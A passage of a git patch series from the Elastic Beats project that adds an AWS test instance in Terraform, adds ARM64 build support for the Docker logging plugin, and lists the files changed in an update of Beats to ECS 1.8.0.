JGJ4KbPcsfrSe5IF0TD5OPkphlg9yTA1MUhDm82TcC+hoSdXCPXbg2F3tR4m1o9aLzbsZ+mL0iHIQMcWrsmbpL/+4nnWlXbrtCODrkS7f15O6fH8c2c7VdyXz/JjSxV5H2D1cr0lTJb+xBJuMF+/3OFhESPHGpZvj3LHyZ7wtKlk4sV64MXC67q/4qmMRlQEVlQR+bixjajaqUkBRF1mSQMyoAd6REslpEdJMV0yzpnfaT6hdtQluAyNzzhbLjpxGjuwkqOrsM4rBivIi+NtRH6wqDYs06OteyEK8Oiy0PLc6W1sDyfNuQb67g/cViLv9sgWybjZw7lvmcRw2ow08hCQ169D8YphWoTX2nN9dB/bhy1bMrXDHXUIDAR2FaSAKc3vyA/1G9Lwbj91H/V6Lmfwx8TazMm7l3hfr5bmh6lAHPznkh/nunh06ybs9NeZ0+4rhrZvh3rjJDe/OmPJHKk70NMW+wPpnV+UJh8NQ5c+kXHAaPS4lH+qZify9lCJaXJPELlLrXpFZmJ4o2ejRvAH2rbzH758QdNgpEDyhdcD5MZg+tvANRzjY0GmZAEYXL9ayXVLOh3iix18lhRj3+GpDPLvzuroyTDvSKEIAnRjDAwBD4MSwN8eaiym/gVkH6es1w9dcfDJnojBJMUtAaPdqs9YyYri14cFZoTxNVV2l4ihFXaXiYDX9593ty9+DHzIhgE9Mf+cOpQcBgBgcfoS39ewHLLJs0WfkLWEixounmow/fbnFOPTn0h8/37lfXfzjzv+k/OnV5OH84uZ68vvVGH/5ljBdtB+jnPuyawSzIUHnyB9TQ7dsrrvTX/M/yu/0WI3wHNkB0bZddV9IjeeQynD+XwAAAP//waIyfw==" } diff --git a/x-pack/metricbeat/module/aws/terraform.tf b/x-pack/metricbeat/module/aws/terraform.tf index e767a028ab1b..4f00b88df5b9 100644 --- a/x-pack/metricbeat/module/aws/terraform.tf +++ b/x-pack/metricbeat/module/aws/terraform.tf @@ -46,3 +46,23 @@ resource "aws_s3_bucket_object" "test" { bucket = aws_s3_bucket.test.id content = "something" } + +resource "aws_instance" "test" { + ami = data.aws_ami.latest-amzn.id + monitoring = true + instance_type = "t1.micro" + tags = { + Name = "metricbeat-test" + } +} + +data "aws_ami" "latest-amzn" { + most_recent = true + owners = ["amazon"] + filter { + name = "name" + values = [ + "amzn2-ami-hvm-*", + ] + } +} From 239cff70b0567945a8f3e7480206aac874701871 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Tue, 16 Feb 2021 20:31:32 +0100 Subject: [PATCH 58/63] Support running Docker logging plugin on ARM64 (#24034) ## What does this PR do? This PR adds support for running Dockerlogbeat on ARM machines. ## Why is it important? Because we want to support running Beats on ARM. --- .ci/packaging.groovy | 1 + .../{Dockerfile => Dockerfile.tmpl} | 2 +- x-pack/dockerlogbeat/magefile.go | 154 +++++++++++------- 3 files changed, 100 insertions(+), 57 deletions(-) rename x-pack/dockerlogbeat/{Dockerfile => Dockerfile.tmpl} (82%) diff --git a/.ci/packaging.groovy b/.ci/packaging.groovy index b90182a5d00d..34a5306eab37 100644 --- a/.ci/packaging.groovy +++ b/.ci/packaging.groovy @@ -204,6 +204,7 @@ pipeline { 'metricbeat', 'packetbeat', 'x-pack/auditbeat', + 'x-pack/dockerlogbeat', 'x-pack/elastic-agent', 'x-pack/filebeat', 'x-pack/heartbeat', diff --git a/x-pack/dockerlogbeat/Dockerfile b/x-pack/dockerlogbeat/Dockerfile.tmpl similarity index 82% rename from x-pack/dockerlogbeat/Dockerfile rename to x-pack/dockerlogbeat/Dockerfile.tmpl index 93fffb3e039f..01e7d951ab68 100644 --- a/x-pack/dockerlogbeat/Dockerfile +++ b/x-pack/dockerlogbeat/Dockerfile.tmpl @@ -1,4 +1,4 @@ -FROM alpine:3.7 +FROM {{ .from }} RUN apk --no-cache add ca-certificates COPY build/plugin/dockerlogbeat /usr/bin/ diff --git a/x-pack/dockerlogbeat/magefile.go b/x-pack/dockerlogbeat/magefile.go index b6abbad70fd1..4c0c7daeb02f 100644 --- a/x-pack/dockerlogbeat/magefile.go +++ b/x-pack/dockerlogbeat/magefile.go @@ -13,6 +13,7 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" "time" @@ -44,17 +45,27 @@ const ( packageStagingDir = "build/package/" packageEndDir = "build/distributions/" rootImageName = "rootfsimage" + dockerfileTmpl = "Dockerfile.tmpl" ) var ( buildDir = filepath.Join(packageStagingDir, logDriverName) dockerExportPath = filepath.Join(packageStagingDir, "temproot.tar") + + platformMap = map[string]map[string]interface{}{ + "amd64": map[string]interface{}{ + "from": "alpine:3.10", + }, + "arm64": map[string]interface{}{ + "from": "arm64v8/alpine:3.10", + }, + } ) func init() { devtools.BeatLicense = "Elastic License" devtools.BeatDescription = "The Docker Logging Driver is a docker plugin for the Elastic Stack." - devtools.Platforms = devtools.Platforms.Filter("linux/amd64") + devtools.Platforms = devtools.Platforms.Filter("linux/amd64 linux/arm64") } // getPluginName returns the fully qualified name:version string. @@ -67,7 +78,7 @@ func getPluginName() (string, error) { } // createContainer builds the plugin and creates the container that will later become the rootfs used by the plugin -func createContainer(ctx context.Context, cli *client.Client) error { +func createContainer(ctx context.Context, cli *client.Client, arch string) error { dockerLogBeatDir, err := os.Getwd() if err != nil { return errors.Wrap(err, "error getting work dir") @@ -77,6 +88,12 @@ func createContainer(ctx context.Context, cli *client.Client) error { return errors.Errorf("not in dockerlogbeat directory: %s", dockerLogBeatDir) } + dockerfile := filepath.Join(packageStagingDir, "Dockerfile") + err = devtools.ExpandFile(dockerfileTmpl, dockerfile, platformMap[arch]) + if err != nil { + return errors.Wrap(err, "error while expanding Dockerfile template") + } + // start to build the root container that'll be used to build the plugin tmpDir, err := ioutil.TempDir("", "dockerBuildTar") if err != nil { @@ -98,7 +115,7 @@ func createContainer(ctx context.Context, cli *client.Client) error { buildOpts := types.ImageBuildOptions{ Tags: []string{rootImageName}, - Dockerfile: "Dockerfile", + Dockerfile: dockerfile, } //build, wait for output buildResp, err := cli.ImageBuild(ctx, buildContext, buildOpts) @@ -137,56 +154,64 @@ func BuildContainer(ctx context.Context) error { return errors.Wrap(err, "error creating build dir") } - err = createContainer(ctx, cli) - if err != nil { - return errors.Wrap(err, "error creating base container") - } + for _, plat := range devtools.Platforms { + arch := plat.GOARCH() + if runtime.GOARCH != arch { + fmt.Println("Skippping building for", arch, "as runtime is different") + continue + } - // create the container that will become our rootfs - CreatedContainerBody, err := cli.ContainerCreate(ctx, &container.Config{Image: rootImageName}, nil, nil, "") - if err != nil { - return errors.Wrap(err, "error creating container") - } + err = createContainer(ctx, cli, arch) + if err != nil { + return errors.Wrap(err, "error creating base container") + } - defer func() { - // cleanup - if _, noClean := os.LookupEnv("DOCKERLOGBEAT_NO_CLEANUP"); !noClean { - err = cleanDockerArtifacts(ctx, CreatedContainerBody.ID, cli) - if err != nil { - fmt.Fprintf(os.Stderr, "Error cleaning up docker: %s", err) - } + // create the container that will become our rootfs + CreatedContainerBody, err := cli.ContainerCreate(ctx, &container.Config{Image: rootImageName}, nil, nil, "") + if err != nil { + return errors.Wrap(err, "error creating container") } - }() - fmt.Printf("Got image: %#v\n", CreatedContainerBody.ID) + defer func() { + // cleanup + if _, noClean := os.LookupEnv("DOCKERLOGBEAT_NO_CLEANUP"); !noClean { + err = cleanDockerArtifacts(ctx, CreatedContainerBody.ID, cli) + if err != nil { + fmt.Fprintf(os.Stderr, "Error cleaning up docker: %s", err) + } + } + }() - file, err := os.Create(dockerExportPath) - if err != nil { - return errors.Wrap(err, "error creating tar archive") - } + fmt.Printf("Got image: %#v\n", CreatedContainerBody.ID) - // export the container to a tar file - exportReader, err := cli.ContainerExport(ctx, CreatedContainerBody.ID) - if err != nil { - return errors.Wrap(err, "error exporting container") - } + file, err := os.Create(dockerExportPath) + if err != nil { + return errors.Wrap(err, "error creating tar archive") + } - _, err = io.Copy(file, exportReader) - if err != nil { - return errors.Wrap(err, "error writing exported container") - } + // export the container to a tar file + exportReader, err := cli.ContainerExport(ctx, CreatedContainerBody.ID) + if err != nil { + return errors.Wrap(err, "error exporting container") + } - //misc prepare operations + _, err = io.Copy(file, exportReader) + if err != nil { + return errors.Wrap(err, "error writing exported container") + } - err = devtools.Copy("config.json", filepath.Join(buildDir, "config.json")) - if err != nil { - return errors.Wrap(err, "error copying config.json") - } + //misc prepare operations - // unpack the tar file into a root directory, which is the format needed for the docker plugin create tool - err = sh.RunV("tar", "-xf", dockerExportPath, "-C", filepath.Join(buildDir, "rootfs")) - if err != nil { - return errors.Wrap(err, "error unpacking exported container") + err = devtools.Copy("config.json", filepath.Join(buildDir, "config.json")) + if err != nil { + return errors.Wrap(err, "error copying config.json") + } + + // unpack the tar file into a root directory, which is the format needed for the docker plugin create tool + err = sh.RunV("tar", "-xf", dockerExportPath, "-C", filepath.Join(buildDir, "rootfs")) + if err != nil { + return errors.Wrap(err, "error unpacking exported container") + } } return nil @@ -293,20 +318,23 @@ func Export() error { version = version + "-SNAPSHOT" } - tarballName := fmt.Sprintf("%s-%s-%s.tar.gz", logDriverName, version, "docker-plugin") + for _, plat := range devtools.Platforms { + arch := plat.GOARCH() + tarballName := fmt.Sprintf("%s-%s-%s-%s.tar.gz", logDriverName, version, arch, "docker-plugin") - outpath := filepath.Join("../..", packageEndDir, tarballName) + outpath := filepath.Join("../..", packageEndDir, tarballName) - err = os.Chdir(packageStagingDir) - if err != nil { - return errors.Wrap(err, "error changing directory") - } + err = os.Chdir(packageStagingDir) + if err != nil { + return errors.Wrap(err, "error changing directory") + } - err = sh.RunV("tar", "zcf", outpath, - filepath.Join(logDriverName, "rootfs"), - filepath.Join(logDriverName, "config.json")) - if err != nil { - return errors.Wrap(err, "error creating release tarball") + err = sh.RunV("tar", "zcf", outpath, + filepath.Join(logDriverName, "rootfs"), + filepath.Join(logDriverName, "config.json")) + if err != nil { + return errors.Wrap(err, "error creating release tarball") + } } return nil @@ -337,14 +365,28 @@ func Package() { start := time.Now() defer func() { fmt.Println("package ran for", time.Since(start)) }() - if _, enabled := devtools.Platforms.Get("linux/amd64"); !enabled { - fmt.Println(">> package: skipping because linux/amd64 is not enabled") + if !isSupportedPlatform() { + fmt.Println(">> package: skipping because no supported platform is enabled") return } mg.SerialDeps(Build, Export) } +func isSupportedPlatform() bool { + _, isAMD64Selected := devtools.Platforms.Get("linux/amd64") + _, isARM64Selected := devtools.Platforms.Get("linux/arm64") + arch := runtime.GOARCH + + if arch == "amd64" && isARM64Selected { + devtools.Platforms = devtools.Platforms.Remove("linux/arm64") + } else if arch == "arm64" && isAMD64Selected { + devtools.Platforms = devtools.Platforms.Remove("linux/amd64") + } + + return len(devtools.Platforms) > 0 +} + // BuildAndInstall builds and installs the plugin func BuildAndInstall() { mg.SerialDeps(Build, Install) From 048c3cc19bf43c8a6b332afaafdd0a2eb8e5bd49 Mon Sep 17 00:00:00 2001 From: Adrian Serrano Date: Tue, 16 Feb 2021 20:39:37 +0100 Subject: [PATCH 59/63] Update Beats to ECS 1.8.0 (#23465) Incorporates ECS 1.8 changes from the following PRs: Support host.type field in add_host_metadata processor and Auditbeat's system/host #23513 Winlogbeat #23563 Auditbeat auditd #23594 Journalbeat #23737 Packetbeat #23783 Filebeat: auditd #23723 cisco #23819 cef #23832 crowdstrike falcon #23875 fortinet firewall #23902 microsoft #23897 elasticsearch/audit #24000 Gsuite/Workspace #23709 o365 #23896 zoom #23904 okta #23929 aws/cloudtrail #23911 aws/s3access #23920 azure #23927 juniper/srx #23936 panw #23931 sophos/xg #23967 system/auth #23961 mysqlenterprise #23978 zeek #23847 Make all Beats and modules report ECS 1.8.0 #23992 Closes #23118 Co-authored-by: Marc Guasch --- CHANGELOG.next.asciidoc | 32 +- NOTICE.txt | 12 +- auditbeat/_meta/fields.common.yml | 21 - auditbeat/cmd/root.go | 2 +- auditbeat/docs/fields.asciidoc | 490 ++- auditbeat/include/fields.go | 2 +- auditbeat/module/auditd/_meta/fields.yml | 16 - auditbeat/module/auditd/audit_linux.go | 79 +- auditbeat/module/auditd/audit_linux_test.go | 59 +- auditbeat/module/auditd/fields.go | 2 +- auditbeat/module/auditd/golden_files_test.go | 225 ++ .../module/auditd/testdata/auditlogin.log | 3 + .../testdata/auditlogin.log-expected.json | 183 + auditbeat/module/auditd/testdata/centos7.log | 8 + .../auditd/testdata/centos7.log-expected.json | 621 +++ auditbeat/module/auditd/testdata/chown.log | 4 + .../auditd/testdata/chown.log-expected.json | 134 + auditbeat/module/auditd/testdata/passwd.log | 4 + .../auditd/testdata/passwd.log-expected.json | 282 ++ auditbeat/module/auditd/testdata/setuid.log | 6 + .../auditd/testdata/setuid.log-expected.json | 291 ++ .../module/auditd/testdata/sudo-asuser.log | 5 + .../testdata/sudo-asuser.log-expected.json | 322 ++ auditbeat/module/auditd/testdata/sudo.log | 20 + .../auditd/testdata/sudo.log-expected.json | 1293 ++++++ auditbeat/module/auditd/testdata/useradd.log | 8 + .../auditd/testdata/useradd.log-expected.json | 551 +++ .../module/auditd/testdata/userlogin.log | 4 + .../testdata/userlogin.log-expected.json | 257 ++ filebeat/docs/fields.asciidoc | 568 ++- filebeat/include/fields.go | 2 +- .../module/apache/access/config/access.yml | 2 +- filebeat/module/apache/error/config/error.yml | 2 +- filebeat/module/auditd/_meta/fields.yml | 20 - filebeat/module/auditd/fields.go | 2 +- filebeat/module/auditd/log/config/log.yml | 2 +- .../auditd/log/ingest/gen-ecs-mappings.py | 176 + .../module/auditd/log/ingest/pipeline.yml | 1828 ++++++++- .../test/audit-cent7-node.log-expected.json | 104 +- .../log/test/audit-rhel6.log-expected.json | 148 +- .../log/test/audit-rhel7.log-expected.json | 814 +++- .../test/audit-ubuntu1604.log-expected.json | 18 + filebeat/module/auditd/log/test/avc.log | 3 + .../auditd/log/test/avc.log-expected.json | 64 + .../auditd/log/test/test.log-expected.json | 85 +- filebeat/module/auditd/log/test/useradd.log | 8 + .../auditd/log/test/useradd.log-expected.json | 300 ++ .../elasticsearch/audit/_meta/fields.yml | 9 +- .../elasticsearch/audit/config/audit.yml | 2 +- .../audit/ingest/pipeline-json.yml | 61 +- .../elasticsearch/audit/ingest/pipeline.yml | 4 + .../test/test-audit-docker.log-expected.json | 21 + .../elasticsearch/audit/test/test-audit.log | 7 + .../audit/test/test-audit.log-expected.json | 192 + .../elasticsearch/deprecation/config/log.yml | 2 +- filebeat/module/elasticsearch/fields.go | 2 +- .../module/elasticsearch/gc/config/gc.yml | 2 +- .../elasticsearch/server/config/log.yml | 2 +- .../elasticsearch/slowlog/config/slowlog.yml | 2 +- filebeat/module/haproxy/log/config/file.yml | 2 +- filebeat/module/haproxy/log/config/syslog.yml | 2 +- filebeat/module/icinga/debug/config/debug.yml | 2 +- filebeat/module/icinga/main/config/main.yml | 2 +- .../module/icinga/startup/config/startup.yml | 2 +- .../module/iis/access/config/iis-access.yml | 2 +- .../module/iis/error/config/iis-error.yml | 2 +- filebeat/module/kafka/log/config/log.yml | 2 +- filebeat/module/kibana/log/config/log.yml | 2 +- filebeat/module/logstash/log/config/log.yml | 2 +- .../logstash/slowlog/config/slowlog.yml | 2 +- filebeat/module/mongodb/log/config/log.yml | 2 +- filebeat/module/mysql/error/config/error.yml | 2 +- .../module/mysql/slowlog/config/slowlog.yml | 2 +- filebeat/module/nats/log/config/log.yml | 2 +- .../nginx/access/config/nginx-access.yml | 2 +- .../module/nginx/error/config/nginx-error.yml | 2 +- .../config/ingress_controller.yml | 2 +- .../module/osquery/result/config/result.yml | 2 +- filebeat/module/postgresql/log/config/log.yml | 2 +- filebeat/module/redis/log/config/log.yml | 2 +- filebeat/module/santa/log/config/file.yml | 2 +- filebeat/module/system/auth/config/auth.yml | 2 +- .../module/system/auth/ingest/pipeline.yml | 53 +- .../test/auth-ubuntu1204.log-expected.json | 610 ++- .../auth/test/secure-rhel7.log-expected.json | 210 +- .../system/auth/test/test.log-expected.json | 18 +- .../auth/test/timestamp.log-expected.json | 9 +- .../module/system/syslog/config/syslog.yml | 2 +- .../traefik/access/config/traefik-access.yml | 2 +- go.mod | 6 +- go.sum | 12 +- heartbeat/cmd/root.go | 2 +- heartbeat/docs/fields.asciidoc | 396 +- heartbeat/include/fields.go | 2 +- journalbeat/_meta/fields.common.yml | 8 +- journalbeat/cmd/root.go | 2 +- journalbeat/docs/fields.asciidoc | 404 +- journalbeat/include/fields.go | 2 +- journalbeat/pkg/journalfield/conv.go | 88 +- journalbeat/pkg/journalfield/conv_test.go | 6 +- journalbeat/pkg/journalfield/default.go | 26 +- journalbeat/pkg/journalfield/default_other.go | 6 +- libbeat/_meta/fields.ecs.yml | 310 +- libbeat/metric/system/host/host.go | 4 +- .../add_host_metadata_test.go | 8 + .../docs/add_host_metadata.asciidoc | 1 + metricbeat/cmd/root.go | 2 +- metricbeat/docs/fields.asciidoc | 396 +- packetbeat/cmd/root.go | 2 +- packetbeat/docs/fields.asciidoc | 396 +- packetbeat/include/fields.go | 2 +- packetbeat/protos/amqp/amqp.go | 4 + packetbeat/protos/cassandra/pub.go | 2 + packetbeat/protos/http/event.go | 6 + packetbeat/protos/http/http.go | 43 + packetbeat/protos/http/http_parser.go | 1 + packetbeat/protos/http/http_test.go | 30 + packetbeat/protos/mongodb/mongodb.go | 2 + packetbeat/protos/mysql/mysql.go | 2 + packetbeat/protos/nfs/request_handler.go | 11 +- packetbeat/protos/sip/plugin.go | 2 + .../tests/system/config/golden-tests.yml | 5 + .../golden/established_tls-expected.json | 2 +- .../golden/http_basic_auth-expected.json | 155 + .../golden/non_established_tls-expected.json | 2 +- .../tests/system/golden/tls_1_3-expected.json | 2 +- .../golden/tls_all_options-expected.json | 2 +- .../system/golden/tls_no_certs-expected.json | 2 +- .../golden/tls_not_detailed-expected.json | 2 +- winlogbeat/cmd/root.go | 2 +- winlogbeat/docs/fields.asciidoc | 396 +- winlogbeat/include/fields.go | 2 +- x-pack/auditbeat/module/system/fields.go | 2 +- .../module/system/host/_meta/data.json | 1 + .../module/system/host/_meta/fields.yml | 4 + x-pack/auditbeat/module/system/host/host.go | 5 + .../auditbeat/module/system/socket/state.go | 4 +- .../module/activemq/audit/config/audit.yml | 2 +- .../module/activemq/log/config/log.yml | 2 +- .../module/aws/cloudtrail/config/aws-s3.yml | 2 +- .../module/aws/cloudtrail/config/file.yml | 2 +- .../module/aws/cloudtrail/ingest/pipeline.yml | 63 +- .../add-user-to-group-json.log-expected.json | 3 + .../change-password-json.log-expected.json | 6 + .../test/console-login-json.log-expected.json | 6 + .../create-access-key-json.log-expected.json | 2 + .../test/create-group-json.log-expected.json | 9 + .../create-key-pair-json.log-expected.json | 3 + .../test/create-trail-json.log-expected.json | 3 + .../test/create-user-json.log-expected.json | 3 + ...-virtual-mfa-device-json.log-expected.json | 3 + ...activate-mfa-device-json.log-expected.json | 1 + .../delete-access-key-json.log-expected.json | 2 + .../test/delete-group-json.log-expected.json | 8 + ...lete-ssh-public-key-json.log-expected.json | 2 + .../test/delete-trail-json.log-expected.json | 3 + .../test/delete-user-json.log-expected.json | 2 + ...-virtual-mfa-device-json.log-expected.json | 3 + ...iguration_recorders-json.log-expected.json | 3 + .../enable-mfa-device-json.log-expected.json | 2 + ...ove-user-from-group-json.log-expected.json | 3 + .../test/start-logging-json.log-expected.json | 3 + .../test/stop-logging-json.log-expected.json | 3 + .../update-access-key-json.log-expected.json | 2 + ...out-password-policy-json.log-expected.json | 3 + .../test/update-group-json.log-expected.json | 8 + ...pdate-login-profile-json.log-expected.json | 2 + ...date-ssh-public-key-json.log-expected.json | 4 + .../test/update-trail-json.log-expected.json | 6 + .../test/update-user-json.log-expected.json | 3 + ...load-ssh-public-key-json.log-expected.json | 1 + .../module/aws/cloudwatch/config/aws-s3.yml | 2 +- .../module/aws/cloudwatch/config/file.yml | 2 +- .../filebeat/module/aws/ec2/config/aws-s3.yml | 2 +- .../filebeat/module/aws/ec2/config/file.yml | 2 +- .../filebeat/module/aws/elb/config/aws-s3.yml | 2 +- .../filebeat/module/aws/elb/config/file.yml | 2 +- .../module/aws/s3access/config/aws-s3.yml | 2 +- .../module/aws/s3access/config/file.yml | 2 +- .../module/aws/s3access/ingest/pipeline.yml | 56 +- .../test/s3_server_access.log-expected.json | 62 +- .../module/aws/s3access/test/test.log | 1 + .../aws/s3access/test/test.log-expected.json | 124 +- .../module/aws/vpcflow/config/input.yml | 2 +- .../activitylogs/config/azure-eventhub.yml | 2 +- .../module/azure/activitylogs/config/file.yml | 2 +- .../azure/activitylogs/ingest/pipeline.yml | 36 +- .../test/activitylogs.log-expected.json | 5 + .../supporttickets_write.log-expected.json | 9 + .../azure/auditlogs/config/azure-eventhub.yml | 2 +- .../module/azure/auditlogs/config/file.yml | 2 +- .../azure/auditlogs/ingest/pipeline.yml | 7 +- .../test/auditlogs.log-expected.json | 1 + .../platformlogs/config/azure-eventhub.yml | 2 +- .../module/azure/platformlogs/config/file.yml | 2 +- .../azure/platformlogs/ingest/pipeline.yml | 16 +- .../platformlogs-eventhub.log-expected.json | 1 + .../test/platformlogs-kube.log-expected.json | 1 + .../signinlogs/config/azure-eventhub.yml | 2 +- .../module/azure/signinlogs/config/file.yml | 2 +- .../azure/signinlogs/ingest/pipeline.yml | 16 +- .../test/signinlogs.log-expected.json | 10 + .../barracuda/spamfirewall/config/input.yml | 2 +- .../module/barracuda/waf/config/input.yml | 2 +- .../module/bluecoat/director/config/input.yml | 2 +- .../filebeat/module/cef/log/config/input.yml | 2 +- .../module/cef/log/ingest/pipeline.yml | 29 +- .../log/test/fp-ngfw-smc.log-expected.json | 30 + .../checkpoint/firewall/config/firewall.yml | 2 +- .../module/cisco/asa/config/input.yml | 2 +- .../additional_messages.log-expected.json | 42 +- .../cisco/asa/test/asa-fix.log-expected.json | 4 - .../module/cisco/ftd/config/input.yml | 2 +- .../cisco/ftd/test/asa-fix.log-expected.json | 4 - .../module/cisco/ios/config/input.yml | 2 +- .../module/cisco/meraki/config/input.yml | 2 +- .../module/cisco/nexus/config/input.yml | 2 +- .../cisco/shared/ingest/asa-ftd-pipeline.yml | 16 +- .../module/cisco/umbrella/config/input.yml | 2 +- .../module/coredns/log/config/coredns.yml | 2 +- .../crowdstrike/falcon/config/falcon.yml | 17 +- .../crowdstrike/falcon/config/pipeline.js | 474 --- .../falcon/ingest/auth_activity_audit.yml | 34 + .../falcon/ingest/detection_summary.yml | 163 + .../falcon/ingest/firewall_match.yml | 137 + .../falcon/ingest/incident_summary.yml | 29 + .../crowdstrike/falcon/ingest/pipeline.yml | 334 ++ .../ingest/remote_response_session_end.yml | 25 + .../ingest/remote_response_session_start.yml | 25 + .../falcon/ingest/user_activity_audit.yml | 29 + .../module/crowdstrike/falcon/manifest.yml | 11 +- .../falcon-audit-events.log-expected.json | 126 +- .../test/falcon-events.log-expected.json | 18 +- .../test/falcon-sample.log-expected.json | 78 +- .../module/cyberark/corepas/config/input.yml | 2 +- .../module/cylance/protect/config/input.yml | 2 +- .../envoyproxy/log/config/envoyproxy.yml | 2 +- .../module/f5/bigipafm/config/input.yml | 2 +- .../module/f5/bigipapm/config/input.yml | 2 +- .../fortinet/clientendpoint/config/input.yml | 2 +- .../fortinet/firewall/config/firewall.yml | 2 +- .../module/fortinet/firewall/ingest/event.yml | 87 - .../fortinet/firewall/ingest/pipeline.yml | 163 +- .../fortinet/firewall/ingest/traffic.yml | 98 +- .../module/fortinet/firewall/ingest/utm.yml | 87 - .../firewall/test/fortinet.log-expected.json | 27 +- .../fortinet/fortimail/config/input.yml | 2 +- .../fortinet/fortimanager/config/input.yml | 2 +- .../module/gcp/audit/config/input.yml | 2 +- .../module/gcp/firewall/config/input.yml | 2 +- .../module/gcp/vpcflow/config/input.yml | 2 +- .../google_workspace/admin/config/config.yml | 2 +- .../google_workspace/admin/config/pipeline.js | 11 + ...in-application-test.json.log-expected.json | 45 +- ...admin-calendar-test.json.log-expected.json | 71 +- .../admin-chat-test.json.log-expected.json | 20 +- ...admin-chromeos-test.json.log-expected.json | 105 +- ...admin-contacts-test.json.log-expected.json | 5 +- ...delegatedadmin-test.json.log-expected.json | 46 +- .../admin-docs-test.json.log-expected.json | 21 +- .../admin-domain-test.json.log-expected.json | 428 +- .../admin-gmail-test.json.log-expected.json | 48 +- .../admin-groups-test.json.log-expected.json | 95 +- ...admin-licenses-test.json.log-expected.json | 49 +- .../admin-mobile-test.json.log-expected.json | 182 +- .../admin-org-test.json.log-expected.json | 85 +- ...admin-security-test.json.log-expected.json | 120 +- .../admin-sites-test.json.log-expected.json | 25 +- .../admin-user-test.json.log-expected.json | 580 ++- .../module/google_workspace/config/common.js | 3 + .../google_workspace/drive/config/config.yml | 2 +- .../test/drive-test.json.log-expected.json | 140 +- .../google_workspace/groups/config/config.yml | 2 +- .../groups/config/pipeline.js | 11 + .../test/groups-test.json.log-expected.json | 170 +- .../google_workspace/login/config/config.yml | 2 +- .../google_workspace/login/config/pipeline.js | 19 + .../test/login-test.json.log-expected.json | 71 +- .../google_workspace/saml/config/config.yml | 2 +- .../google_workspace/saml/config/pipeline.js | 2 +- .../test/saml-test.json.log-expected.json | 16 +- .../user_accounts/config/config.yml | 2 +- .../user_accounts-test.json.log-expected.json | 40 +- .../module/gsuite/admin/config/config.yml | 2 +- .../module/gsuite/admin/config/pipeline.js | 11 + ...in-application-test.json.log-expected.json | 45 +- ...admin-calendar-test.json.log-expected.json | 71 +- ...ite-admin-chat-test.json.log-expected.json | 20 +- ...admin-chromeos-test.json.log-expected.json | 105 +- ...admin-contacts-test.json.log-expected.json | 5 +- ...delegatedadmin-test.json.log-expected.json | 46 +- ...ite-admin-docs-test.json.log-expected.json | 21 +- ...e-admin-domain-test.json.log-expected.json | 428 +- ...te-admin-gmail-test.json.log-expected.json | 48 +- ...e-admin-groups-test.json.log-expected.json | 95 +- ...admin-licenses-test.json.log-expected.json | 49 +- ...e-admin-mobile-test.json.log-expected.json | 182 +- ...uite-admin-org-test.json.log-expected.json | 85 +- ...admin-security-test.json.log-expected.json | 120 +- ...te-admin-sites-test.json.log-expected.json | 25 +- ...ite-admin-user-test.json.log-expected.json | 580 ++- .../filebeat/module/gsuite/config/common.js | 3 + .../module/gsuite/drive/config/config.yml | 2 +- .../gsuite-drive-test.json.log-expected.json | 140 +- .../module/gsuite/groups/config/config.yml | 2 +- .../module/gsuite/groups/config/pipeline.js | 11 + .../gsuite-groups-test.json.log-expected.json | 170 +- .../module/gsuite/login/config/config.yml | 2 +- .../module/gsuite/login/config/pipeline.js | 19 + .../gsuite-login-test.json.log-expected.json | 59 +- .../module/gsuite/saml/config/config.yml | 2 +- .../module/gsuite/saml/config/pipeline.js | 2 +- .../gsuite-saml-test.json.log-expected.json | 16 +- .../gsuite/user_accounts/config/config.yml | 2 +- ...-user_accounts-test.json.log-expected.json | 40 +- .../module/ibmmq/errorlog/config/errorlog.yml | 2 +- .../imperva/securesphere/config/input.yml | 2 +- .../module/infoblox/nios/config/input.yml | 2 +- .../module/iptables/log/config/input.yml | 2 +- .../module/juniper/junos/config/input.yml | 2 +- .../module/juniper/netscreen/config/input.yml | 2 +- .../module/juniper/srx/config/srx.yml | 2 +- .../module/juniper/srx/ingest/pipeline.yml | 20 + .../juniper/srx/test/atp.log-expected.json | 6 + .../juniper/srx/test/flow.log-expected.json | 62 +- .../juniper/srx/test/idp.log-expected.json | 6 + .../juniper/srx/test/utm.log-expected.json | 15 + .../microsoft/defender_atp/config/atp.yml | 2 +- .../defender_atp/ingest/pipeline.yml | 27 +- .../defender_atp-test.json.log-expected.json | 9 +- .../module/microsoft/dhcp/config/input.yml | 2 +- .../m365_defender/config/defender.yml | 2 +- .../m365_defender/ingest/pipeline.yml | 27 +- ...365_defender-test.ndjson.log-expected.json | 4 +- .../module/misp/threat/config/input.yml | 2 +- .../module/mssql/log/config/config.yml | 2 +- .../mysqlenterprise/audit/config/config.yml | 2 +- .../mysqlenterprise/audit/ingest/pipeline.yml | 52 +- .../audit/test/mysql_audit_test.log | 5 +- .../test/mysql_audit_test.log-expected.json | 323 +- .../module/netflow/log/config/netflow.yml | 2 +- .../netscout/sightline/config/input.yml | 2 +- .../module/o365/audit/_meta/fields.yml | 39 + .../module/o365/audit/config/input.yml | 7 +- .../module/o365/audit/config/pipeline.js | 229 +- .../test/04-sharepoint.log-expected.json | 4 + .../06-sharepointfileop.log-expected.json | 11 + .../o365/audit/test/08-azuread-users.log | 11 + .../test/08-azuread-users.log-expected.json | 1212 ++++++ .../audit/test/08-azuread.log-expected.json | 120 +- .../test/11-dlp-sharepoint.log-expected.json | 7 + .../test/13-dlp-exchange.log-expected.json | 1 + .../test/14-sp-sharing-op.log-expected.json | 10 + .../15-azuread-sts-logon.log-expected.json | 64 + .../o365/audit/test/25-ms-teams-groups.log | 49 + .../test/25-ms-teams-groups.log-expected.json | 3456 +++++++++++++++++ .../audit/test/25-ms-teams.log-expected.json | 44 +- .../test/40-sec-comp-alerts.log-expected.json | 1 + x-pack/filebeat/module/o365/fields.go | 2 +- .../module/okta/system/config/input.yml | 18 +- .../module/okta/system/config/pipeline.js | 215 - .../module/okta/system/ingest/pipeline.yml | 497 +++ .../okta-system-test.json.log-expected.json | 41 +- .../oracle/database_audit/config/config.yml | 2 +- .../module/panw/panos/config/input.yml | 2 +- .../module/panw/panos/ingest/pipeline.yml | 12 + .../test/pan_inc_other.log-expected.json | 2 - .../test/pan_inc_threat.log-expected.json | 200 - .../test/pan_inc_traffic.log-expected.json | 197 - .../panw/panos/test/threat.log-expected.json | 228 +- .../panw/panos/test/traffic.log-expected.json | 300 +- .../proofpoint/emailsecurity/config/input.yml | 2 +- .../module/rabbitmq/log/config/log.yml | 2 +- .../radware/defensepro/config/input.yml | 2 +- 